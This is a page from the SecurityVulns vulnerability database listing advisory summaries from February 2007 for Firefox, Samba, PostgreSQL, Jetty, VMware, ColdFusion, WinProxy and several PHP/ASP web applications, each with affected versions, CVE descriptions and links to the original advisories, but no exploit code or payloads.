Computer Security
[EN] securityvulns.ru no-pyccku


Mozilla Firefox weak PRNG generator
Published:05.02.2007
Source:
SecurityVulns ID:7180
Type:client
Threat Level:
5/10
Description:Weak PRNG generator is used to generate temporary files names for XMLHttpRequest. It may be used to access content of local files by creating temporary HTML file with predictable name.
Affected:MOZILLA : Firefox 1.5
CVE:CVE-2007-0801 (The nsExternalAppHandler::SetUpTempFile function in Mozilla Firefox 1.5.0.9 creates temporary files with predictable filenames based on creation time, which allows remote attackers to execute arbitrary web script or HTML via a crafted XMLHttpRequest.)
 CVE-2007-0800 (Cross-zone vulnerability in Mozilla Firefox 1.5.0.9 considers blocked popups to have an internal zone origin, which allows user-assisted remote attackers to cross zone restrictions and read arbitrary file:// URIs by convincing a user to show a blocked popup.)
Original documentdocumentMichal Zalewski, [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops (05.02.2007)

Samba file server multiple security vulnerabilities
updated since 05.02.2007
Published:05.02.2007
Source:
SecurityVulns ID:7181
Type:remote
Threat Level:
6/10
Description:Solaris nss_winbind.so.1 gethostbyname() and nss_winbind.so.1 functions buffer overflow. Remote DoS in smbd with infinite loop. Format string vulnerability in VFS afsacl.so plugin.
Affected:SAMBA : Samba 3.0
CVE:CVE-2007-0454 (Format string vulnerability in the afsacl.so VFS module in Samba 3.0.6 through 3.0.23d allows context-dependent attackers to execute arbitrary code via format string specifiers in a filename on an AFS file system, which is not properly handled during Windows ACL mapping.)
 CVE-2007-0453 (Buffer overflow in the nss_winbind.so.1 library in Samba 3.0.21 through 3.0.23d, as used in the winbindd daemon on Solaris, allows attackers to execute arbitrary code via the (1) gethostbyname and (2) getipnodebyname functions.)
 CVE-2007-0452 (smbd in Samba 3.0.6 through 3.0.23d allows remote authenticated users to cause a denial of service (memory and CPU exhaustion) by renaming a file in a way that prevents a request from being removed from the deferred open queue, which triggers an infinite loop.)
Original documentdocumentSAMBA, [SAMBA-SECURITY] CVE-2007-0454: Format string bug in afsacl.so VFS plugin (05.02.2007)
 documentSAMBA, [SAMBA-SECURITY] CVE-2007-0452: Potential DoS against smbd in Samba 3.0.6 - 3.0.23d (05.02.2007)
 documentSAMBA, [SAMBA-SECURITY] CVE-2007-0453: Buffer overrun in nss_winbind.so.1 on Solaris (05.02.2007)

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:05.02.2007
Source:
SecurityVulns ID:7182
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:DVDDB : DVDdb 0.6
 SAKIC : Wap Portal Server 1.2
 TUFAT : Flashchat 4.7
CVE:CVE-2007-0834 (Cross-site scripting (XSS) vulnerability in FlashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via the user name field when the user joins a chat room, a different vulnerability than CVE-2007-0807. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)
 CVE-2007-0814 (Multiple cross-site scripting (XSS) vulnerabilities in Adrenalin's ASP Chat allow remote attackers to inject arbitrary web script or HTML (1) via the psuedo (pseudo) field or (2) during chat.)
 CVE-2007-0813 (Cross-site scripting (XSS) vulnerability in Home production MySearchEngine allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.)
 CVE-2007-0807 (Cross-site scripting (XSS) vulnerability in info.php in flashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via a channel title (aka room name) that is not properly handled by the "who's online" feature.)
 CVE-2007-0795 (Multiple PHP remote file inclusion vulnerabilities in Wap Portal Server 1.x allow remote attackers to execute arbitrary PHP code via a URL in the language parameter to (1) index.php and (2) admin/index.php.)
 CVE-2007-0794 (** DISPUTED ** SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions.)
 CVE-2007-0793 (PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter.)
Original documentdocumentbinaryloc_(at)_gmail.com, flashChat 4.7.8 Cross Site Scripting Vulnerability (05.02.2007)
 documentstormhacker_(at)_hotmail.com, flashChat 4.7.8 Cross Site Scripting Vulnerability (05.02.2007)
 documentstormhacker_(at)_hotmail.com, Wap Portal Serve 1.* <= Remote File Inclusion (05.02.2007)
 documentgokhankaya_(at)_hotmail.com, dvddb-0.6 media remote file include vuln. (05.02.2007)
 documentgokhankaya_(at)_hotmail.com, dvddb-0.6 media sql-inj. vuln. (05.02.2007)
 documentOmid, Sql injection bugs in Xoops 2.0.16 + Weblinks module (05.02.2007)
 documentsn0oPy.team_(at)_gmail.com, Adrenalin's ASP Chat XSS (05.02.2007)
 documentsn0oPy.team_(at)_gmail.com, MysearchEngine XSS (05.02.2007)

Multiple VMWare clipboard problem
Published:05.02.2007
Source:
SecurityVulns ID:7183
Type:local
Threat Level:
3/10
Description:Content removed from clepboard may reapper during switching between host and guest systems.
Affected:VMWARE : VMware Workstation 5.5
CVE:CVE-2007-0833 (VMware Workstation 5.5.3 34685, when the "Enable copy and paste to and from this virtual machine" option is enabled, preserves clipboard data on the guest operating system after it was deleted on the host operating system, which might allow local users to read clipboard contents by moving the focus back to the host operating system.)
 CVE-2007-0832 (VMware Workstation 5.5.3 34685 does not immediately change the availability of a shared clipboard when the "Enable copy and paste to and from this virtual machine" checkbox is changed, which allows local users to obtain sensitive information or conduct certain attacks that are facilitated by weaker isolation between the host and guest operating systems.)
Original documentdocumentEitan Caspi, Vmare workstation guest isolation weaknesses (clipboard transfer) (05.02.2007)

Jetty web server weak pseudo-random number generator
Published:05.02.2007
Source:
SecurityVulns ID:7184
Type:remote
Threat Level:
5/10
Description:Weak PRNG generator is used for session cookie making it's possible to spoof the session id.
Affected:JETTY : Jetty 5.1
 JETTY : Jetty 4.2
 JETTY : Jetty 6.0
 JETTY : Jetty 6.1
CVE:CVE-2006-6969 (Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.)
Original documentdocumentNGSSoftware Insight Security Research Advisory (NISR), Jetty Session ID Prediction (05.02.2007)

ColdFusion crossite scripting
Published:05.02.2007
Source:
SecurityVulns ID:7185
Type:remote
Threat Level:
5/10
Description:User-Agent field from HTTP request is used unfiltered in error message text. It's possible to manipulate client's User-Agent field through Flash.
Affected:ADOBE : ColdFusion Server 5.0
CVE:CVE-2007-0817 (Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page.)
Original documentdocumentdigi7al64_(at)_gmail.com, Cold Fusion Web Server XSS 0 day (05.02.2007)

PostgreSQL multiple security vulnerabilities
Published:05.02.2007
Source:
SecurityVulns ID:7186
Type:remote
Threat Level:
6/10
Description:Server internal memory regions reading because of invalid datatype handling in SQL functions and with ALTER COLUMN TYPE during request execution.
Affected:POSTGRES : PostgreSQL 7.4
CVE:CVE-2007-0556 (The query planner in PostgreSQL before 8.0.11, 8.1 before 8.1.7, and 8.2 before 8.2.2 does not verify that a table is compatible with a "previously made query plan," which allows remote authenticated users to cause a denial of service (server crash) and possibly access database content via an "ALTER COLUMN TYPE" SQL statement, which can be leveraged to read arbitrary memory from the server.)
 CVE-2007-0555 (PostgreSQL 7.3 before 7.3.13, 7.4 before 7.4.16, 8.0 before 8.0.11, 8.1 before 8.1.7, and 8.2 before 8.2.2 allows attackers to disable certain checks for the data types of SQL function arguments, which allows remote authenticated users to cause a denial of service (server crash) and possibly access database content.)
 CVE-2007-0555 (PostgreSQL 7.3 before 7.3.13, 7.4 before 7.4.16, 8.0 before 8.0.11, 8.1 before 8.1.7, and 8.2 before 8.2.2 allows attackers to disable certain checks for the data types of SQL function arguments, which allows remote authenticated users to cause a denial of service (server crash) and possibly access database content.)
Original documentdocumentUBUNTU, [Full-disclosure] [USN-417-1] PostgreSQL vulnerabilities (05.02.2007)

WinProxy buffer overflow
Published:05.02.2007
Source:
SecurityVulns ID:7187
Type:remote
Threat Level:
6/10
Description:Buffer overflow on parsing HTTP CONNECT proxy request.
Affected:BLUECOAT : WinProxy 6.0
 BLUECOAT : WinProxy 6.1
CVE:CVE-2007-0796 (Blue Coat Systems WinProxy 6.1a and 6.0 r1c, and possibly earlier, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP CONNECT request, which triggers heap corruption.)
Original documentdocumentIDEFENSE, [Full-disclosure] iDefense Security Advisory 02.02.07: Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability (05.02.2007)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod